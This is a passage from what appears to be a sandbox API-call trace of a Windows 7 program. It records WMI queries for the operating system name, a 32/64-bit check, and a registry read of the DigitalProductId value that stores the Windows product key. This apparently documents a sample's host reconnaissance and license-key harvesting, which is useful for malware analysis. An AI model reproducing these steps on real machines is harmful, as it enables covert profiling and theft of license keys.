[1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189bdc | out: ppvObject=0x189bdc*=0x7a142c) returned 0x0 [0231.642] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b98 | out: ppvObject=0x189b98*=0x0) returned 0x80004002 [0231.643] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1899b4 | out: ppvObject=0x1899b4*=0x0) returned 0x80004002 [0231.643] WbemLocator:IUnknown:AddRef (This=0x7a142c) returned 0x3 [0231.643] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1894f4 | out: ppvObject=0x1894f4*=0x0) returned 0x80004002 [0231.643] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1894a4 | out: ppvObject=0x1894a4*=0x0) returned 0x80004002 [0231.644] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1894b0 | out: ppvObject=0x1894b0*=0x7a138c) returned 0x0 [0231.644] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x7a138c, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1894b8 | out: pCid=0x1894b8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0231.644] WbemLocator:IUnknown:Release (This=0x7a138c) returned 0x3 [0231.644] CoGetContextToken (in: pToken=0x189510 | out: pToken=0x189510) returned 0x0 [0231.644] CoGetContextToken (in: pToken=0x189918 | out: pToken=0x189918) returned 0x0 [0231.644] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1899a8 | out: ppvObject=0x1899a8*=0x7a1414) returned 0x0 [0231.644] WbemLocator:IRpcOptions:Query (in: This=0x7a1414, pPrx=0x7a142c, dwProperty=2, pdwValue=0x1899d0 | out: pdwValue=0x1899d0) returned 0x80004002 [0231.644] WbemLocator:IUnknown:Release (This=0x7a1414) returned 0x3 [0231.644] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x2 [0231.644] CoGetContextToken (in: pToken=0x189ef0 | out: pToken=0x189ef0) returned 0x0 [0231.644] CoGetContextToken (in: pToken=0x189e50 | out: pToken=0x189e50) returned 0x0 [0231.644] WbemLocator:IUnknown:QueryInterface (in: This=0x7a142c, riid=0x189f20*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x189f1c | out: ppvObject=0x189f1c*=0x5b2d2a4) returned 0x0 [0231.644] IUnknown:AddRef (This=0x5b2d2a4) returned 0x4 [0231.644] IUnknown:Release (This=0x5b2d2a4) returned 0x3 [0231.644] IUnknown:Release (This=0x5b2d2a4) returned 0x2 [0231.644] IUnknown:Release (This=0x5b2c934) returned 0x2 [0231.644] SysStringLen (param_1=0x0) returned 0x0 [0231.645] IEnumWbemClassObject:Reset (This=0x5b2d2a4) returned 0x0 [0231.650] CoTaskMemAlloc (cb=0x4) returned 0x7e1c90 [0231.651] IEnumWbemClassObject:Next (in: This=0x5b2d2a4, lTimeout=-1, uCount=0x1, apObjects=0x7e1c90, puReturned=0x279b8fc | out: apObjects=0x7e1c90*=0x5b2d2e0, puReturned=0x279b8fc*=0x1) returned 0x0 [0232.256] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189798 | out: ppvObject=0x189798*=0x5b2d2e0) returned 0x0 [0232.256] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189754 | out: ppvObject=0x189754*=0x0) returned 0x80004002 [0232.258] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x749afe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189574 | out: ppvObject=0x189574*=0x0) returned 0x80004002 [0232.258] IUnknown:AddRef (This=0x5b2d2e0) returned 0x3 [0232.258] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x1890b4 | out: ppvObject=0x1890b4*=0x0) returned 0x80004002 [0232.258] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189064 | out: ppvObject=0x189064*=0x0) returned 0x80004002 [0232.258] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189070 | out: ppvObject=0x189070*=0x5b2d2e4) returned 0x0 [0232.258] IMarshal:GetUnmarshalClass (in: This=0x5b2d2e4, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x189078 | out: pCid=0x189078*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0232.258] IUnknown:Release (This=0x5b2d2e4) returned 0x3 [0232.258] CoGetContextToken (in: pToken=0x1890d0 | out: pToken=0x1890d0) returned 0x0 [0232.258] CoGetContextToken (in: pToken=0x1894d8 | out: pToken=0x1894d8) returned 0x0 [0232.258] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189568 | out: ppvObject=0x189568*=0x0) returned 0x80004002 [0232.258] IUnknown:Release (This=0x5b2d2e0) returned 0x2 [0232.258] CoGetContextToken (in: pToken=0x189aa8 | out: pToken=0x189aa8) returned 0x0 [0232.258] CoGetContextToken (in: pToken=0x189a08 | out: pToken=0x189a08) returned 0x0 [0232.259] IUnknown:QueryInterface (in: This=0x5b2d2e0, riid=0x189ad8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189ad4 | out: ppvObject=0x189ad4*=0x5b2d2e0) returned 0x0 [0232.259] IUnknown:AddRef (This=0x5b2d2e0) returned 0x4 [0232.259] IUnknown:Release (This=0x5b2d2e0) returned 0x3 [0232.259] IUnknown:Release (This=0x5b2d2e0) returned 0x2 [0232.259] CoTaskMemFree (pv=0x7e1c90) [0232.259] CoGetContextToken (in: pToken=0x189e18 | out: pToken=0x189e18) returned 0x0 [0232.259] IUnknown:AddRef (This=0x5b2d2e0) returned 0x3 [0232.266] IWbemClassObject:Get (in: This=0x5b2d2e0, wszName="__GENUS", lFlags=0, pVal=0x18a128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a1a8*=0, plFlavor=0x18a1a4*=0 | out: pVal=0x18a128*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x18a1a8*=3, plFlavor=0x18a1a4*=64) returned 0x0 [0232.267] IWbemClassObject:Get (in: This=0x5b2d2e0, wszName="__PATH", lFlags=0, pVal=0x18a10c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x18a190*=0, plFlavor=0x18a18c*=0 | out: pVal=0x18a10c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\YKYD69Q\\root\\cimv2:Win32_OperatingSystem=@", varVal2=0x0), pType=0x18a190*=8, plFlavor=0x18a18c*=64) returned 0x0 [0232.268] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_OperatingSystem=@") returned 0x58 [0232.268] SysStringByteLen (bstr="\\\\YKYD69Q\\root\\cimv2:Win32_OperatingSystem=@") returned 0x58 [0232.268] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a138 | out: ppv=0x18a138*=0x766114) returned 0x0 [0232.268] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a130 | out: pAptType=0x18a130*=1) returned 0x0 [0232.268] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a134 | out: ppvObject=0x18a134*=0x0) returned 0x80004002 [0232.268] IUnknown:Release (This=0x766114) returned 0x1 [0232.269] CoGetClassObject (in: rclsid=0x7b5544*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189aa0 | out: ppv=0x189aa0*=0x5b20a10) returned 0x0 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b20a10, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189cb8 | out: ppvObject=0x189cb8*=0x0) returned 0x80004002 [0232.269] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5b20a10, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189ccc | out: ppvObject=0x189ccc*=0x5b32fb8) returned 0x0 [0232.269] WbemDefPath:IUnknown:Release (This=0x5b20a10) returned 0x0 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1898ec | out: ppvObject=0x1898ec*=0x5b32fb8) returned 0x0 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1898a8 | out: ppvObject=0x1898a8*=0x0) returned 0x80004002 [0232.269] WbemDefPath:IUnknown:AddRef (This=0x5b32fb8) returned 0x3 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189204 | out: ppvObject=0x189204*=0x0) returned 0x80004002 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x1891b4 | out: ppvObject=0x1891b4*=0x0) returned 0x80004002 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1891c0 | out: ppvObject=0x1891c0*=0x7e1cc0) returned 0x0 [0232.269] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7e1cc0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1891c8 | out: pCid=0x1891c8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0232.269] WbemDefPath:IUnknown:Release (This=0x7e1cc0) returned 0x3 [0232.269] CoGetContextToken (in: pToken=0x189220 | out: pToken=0x189220) returned 0x0 [0232.269] CoGetContextToken (in: pToken=0x189628 | out: pToken=0x189628) returned 0x0 [0232.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1896b8 | out: ppvObject=0x1896b8*=0x0) returned 0x80004002 [0232.270] WbemDefPath:IUnknown:Release (This=0x5b32fb8) returned 0x2 [0232.270] WbemDefPath:IUnknown:Release (This=0x5b32fb8) returned 0x1 [0232.270] CoGetContextToken (in: pToken=0x189fb0 | out: pToken=0x189fb0) returned 0x0 [0232.270] CoGetContextToken (in: pToken=0x189f10 | out: pToken=0x189f10) returned 0x0 [0232.270] WbemDefPath:IUnknown:QueryInterface (in: This=0x5b32fb8, riid=0x189fe0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x189fdc | out: ppvObject=0x189fdc*=0x5b32fb8) returned 0x0 [0232.270] WbemDefPath:IUnknown:AddRef (This=0x5b32fb8) returned 0x3 [0232.270] WbemDefPath:IUnknown:Release (This=0x5b32fb8) returned 0x2 [0232.270] WbemDefPath:IWbemPath:SetText (This=0x5b32fb8, uMode=0x4, pszPath="\\\\YKYD69Q\\root\\cimv2:Win32_OperatingSystem=@") returned 0x0 [0232.270] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a164 | out: puCount=0x18a164*=0x2) returned 0x0 [0232.270] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a160*=0x0, pszText=0x0 | out: puBuffLength=0x18a160*=0xf, pszText=0x0) returned 0x0 [0232.270] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a160*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a160*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.272] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a12c | out: puCount=0x18a12c*=0x2) returned 0x0 [0232.272] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a128*=0x0, pszText=0x0 | out: puBuffLength=0x18a128*=0xf, pszText=0x0) returned 0x0 [0232.272] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a128*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a128*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.272] IWbemClassObject:Get (in: This=0x5b2d2e0, wszName="Caption", lFlags=0, pVal=0x18a128*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x279c7b4*=0, plFlavor=0x279c7b8*=0 | out: pVal=0x18a128*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x279c7b4*=8, plFlavor=0x279c7b8*=0) returned 0x0 [0232.272] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0232.272] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0232.273] IWbemClassObject:Get (in: This=0x5b2d2e0, wszName="Caption", lFlags=0, pVal=0x18a130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x279c7b4*=8, plFlavor=0x279c7b8*=0 | out: pVal=0x18a130*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 7 Professional ", varVal2=0x0), pType=0x279c7b4*=8, plFlavor=0x279c7b8*=0) returned 0x0 [0232.273] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0232.273] SysStringByteLen (bstr="Microsoft Windows 7 Professional ") returned 0x42 [0232.276] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76990000 [0232.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x18a158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64Processërze\x9bÊ\x94Â\x86t ¦\x18", lpUsedDefaultChar=0x0) returned 14 [0232.276] GetProcAddress (hModule=0x76990000, lpProcName="IsWow64Process") returned 0x769a195e [0232.276] GetCurrentProcess () returned 0xffffffff [0232.276] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18a1b8 | out: Wow64Process=0x18a1b8) returned 1 [0232.290] CoGetContextToken (in: pToken=0x18a038 | out: pToken=0x18a038) returned 0x0 [0232.290] WbemLocator:IUnknown:Release (This=0x7a142c) returned 0x1 [0232.290] IUnknown:Release (This=0x5b2d2a4) returned 0x0 [0232.320] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76990000 [0232.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x18a184, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64Processërze\x9bÊ\x94Â\x86t ¦\x18", lpUsedDefaultChar=0x0) returned 14 [0232.321] GetProcAddress (hModule=0x76990000, lpProcName="IsWow64Process") returned 0x769a195e [0232.321] GetCurrentProcess () returned 0xffffffff [0232.321] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18a1e4 | out: Wow64Process=0x18a1e4) returned 1 [0232.326] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20119, phkResult=0x18a19c | out: phkResult=0x18a19c*=0x41c) returned 0x0 [0232.327] RegQueryValueExW (in: hKey=0x41c, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x18a1bc, lpData=0x0, lpcbData=0x18a1b8*=0x0 | out: lpType=0x18a1bc*=0x3, lpData=0x0, lpcbData=0x18a1b8*=0xa4) returned 0x0 [0232.327] RegQueryValueExW (in: hKey=0x41c, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x18a1bc, lpData=0x279dde4, lpcbData=0x18a1b8*=0xa4 | out: lpType=0x18a1bc*=0x3, lpData=0x279dde4*, lpcbData=0x18a1b8*=0xa4) returned 0x0 [0232.391] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a17c | out: puCount=0x18a17c*=0x2) returned 0x0 [0232.391] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a178*=0x0, pszText=0x0 | out: puBuffLength=0x18a178*=0xf, pszText=0x0) returned 0x0 [0232.391] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=4, puBuffLength=0x18a178*=0xf, pszText="00000000000000" | out: puBuffLength=0x18a178*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0232.391] CoGetObjectContext (in: riid=0x27987bc*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18a104 | out: ppv=0x18a104*=0x766114) returned 0x0 [0232.392] IComThreadingInfo:GetCurrentApartmentType (in: This=0x766114, pAptType=0x18a0fc | out: pAptType=0x18a0fc*=1) returned 0x0 [0232.392] IUnknown:QueryInterface (in: This=0x766114, riid=0x27987a4*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x18a100 | out: ppvObject=0x18a100*=0x0) returned 0x80004002 [0232.392] IUnknown:Release (This=0x766114) returned 0x1 [0232.392] CoGetClassObject (in: rclsid=0x7b5574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7490d1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x189d20 | out: ppv=0x189d20*=0x5b2d218) returned 0x0 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d218, riid=0x74940ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x189f38 | out: ppvObject=0x189f38*=0x0) returned 0x80004002 [0232.393] WbemLocator:IClassFactory:CreateInstance (in: This=0x5b2d218, pUnkOuter=0x0, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189f4c | out: ppvObject=0x189f4c*=0x5b2d230) returned 0x0 [0232.393] WbemLocator:IUnknown:Release (This=0x5b2d218) returned 0x0 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x7487e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189b6c | out: ppvObject=0x189b6c*=0x5b2d230) returned 0x0 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x749afc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x189b28 | out: ppvObject=0x189b28*=0x0) returned 0x80004002 [0232.393] WbemLocator:IUnknown:AddRef (This=0x5b2d230) returned 0x3 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x749af90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x189484 | out: ppvObject=0x189484*=0x0) returned 0x80004002 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x749af860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x189434 | out: ppvObject=0x189434*=0x0) returned 0x80004002 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x7499c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189440 | out: ppvObject=0x189440*=0x0) returned 0x80004002 [0232.393] CoGetContextToken (in: pToken=0x1894a0 | out: pToken=0x1894a0) returned 0x0 [0232.393] CoGetContextToken (in: pToken=0x1898a8 | out: pToken=0x1898a8) returned 0x0 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x749afb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x189938 | out: ppvObject=0x189938*=0x0) returned 0x80004002 [0232.393] WbemLocator:IUnknown:Release (This=0x5b2d230) returned 0x2 [0232.393] WbemLocator:IUnknown:Release (This=0x5b2d230) returned 0x1 [0232.393] CoGetContextToken (in: pToken=0x189f18 | out: pToken=0x189f18) returned 0x0 [0232.393] CoGetContextToken (in: pToken=0x189e78 | out: pToken=0x189e78) returned 0x0 [0232.393] WbemLocator:IUnknown:QueryInterface (in: This=0x5b2d230, riid=0x189f48*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x189f44 | out: ppvObject=0x189f44*=0x5b2d230) returned 0x0 [0232.393] WbemLocator:IUnknown:AddRef (This=0x5b2d230) returned 0x3 [0232.393] WbemLocator:IUnknown:Release (This=0x5b2d230) returned 0x2 [0232.393] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5b20820, puCount=0x18a0e0 | out: puCount=0x18a0e0*=0x2) returned 0x0 [0232.393] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0dc*=0x0, pszText=0x0 | out: puBuffLength=0x18a0dc*=0xf, pszText=0x0) returned 0x0 [0232.393] WbemDefPath:IWbemPath:GetText (in: This=0x5b20820, lFlags=8, puBuffLength=0x18a0dc*=0xf, pszText="00000000000000" | out: 